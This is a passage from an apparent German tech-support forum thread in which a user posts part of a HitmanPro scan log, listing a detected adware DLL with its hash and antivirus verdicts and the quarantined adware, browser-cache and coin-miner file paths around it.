          5.9s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.6s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.0s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.5s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.7s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.6s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

BaBi · 13.02.2017, 23:01

hitman teil 4

Code:

ATTFilter

   C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
      Size . . . . . . . : 248.320 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.6
      SHA-256  . . . . . : 4D9A03EE1BE889ECA4F57296073691513350B540A22E5CCC60B7442A95DEFC4A
      Version  . . . . . : 1.0.0.27567
    > Bitdefender  . . . : Adware.Generic.1693800
    > Kaspersky  . . . . : not-a-virus:AdWare.Win32.AdAgent.je
    > HitmanPro  . . . . : App/Generic-CK
      Fuzzy  . . . . . . : 105.0
      Forensic Cluster
         -2.3s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.3s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.8s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.7s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.7s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.7s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.7s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.7s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.7s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.6s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.6s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.0s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.6s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.6s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.5s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.5s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.4s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.4s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
